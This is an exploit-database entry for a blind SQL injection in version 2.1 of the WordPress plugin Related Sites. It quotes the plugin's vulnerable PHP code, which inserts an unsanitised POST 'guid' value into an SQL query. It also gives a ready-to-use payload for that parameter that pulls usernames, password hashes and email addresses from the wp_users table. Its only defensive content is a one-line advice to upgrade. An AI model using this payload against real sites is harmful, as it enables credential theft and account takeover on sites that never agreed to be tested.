WordPress Plugin Related Sites 2.1 BlindSQLinj Vuln

vendor:

Related Sites

by:

eLwaux

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Related Sites

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:wordpress:related_sites

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

WordPress Plugin Related Sites 2.1 BlindSQLinj Vuln

A Blind SQL Injection vulnerability exists in WordPress Plugin Related Sites 2.1. An attacker can exploit this vulnerability by sending a specially crafted POST request to the vulnerable BTE_RW_webajax.php script. The POST request contains a malicious SQL query in the 'guid' parameter which can be used to extract sensitive information from the database.

Mitigation:

Upgrade to the latest version of WordPress Plugin Related Sites.

Source

Exploit-DB raw data:

WordPress Plugin Related Sites 2.1 BlindSQLinj Vuln



http://wordpress.org/extend/plugins/related-sites/
/wp-content/plugins/related-sites/BTE_RW_webajax.php

eLwaux(c) 30.05.2009, uasc.org.ua


SQL-Inj

27:  $guid = $_POST['guid'];
28:  $click = $_POST['click'];
31:  $ref = $_SERVER["HTTP_REFERER"];
40:  if ($guid!="" && $click!="" && $hostname!="" && $ipaddr!="" && $ref!="") {
53:   $sql = "INSERT INTO $clicks_table_name (guid,click) VALUES ('$guid','$clickinfo')";
55:  }

exploit:
POST: guid = 0', (select concat_ws(0x3a,user_login,user_pass,user_nicename,user_email) from wp_users where ID>0 and user_status=0 limit 1 ) );-- 
POST: click = .
HTTP_REFERER = .

# milw0rm.com [2009-06-30]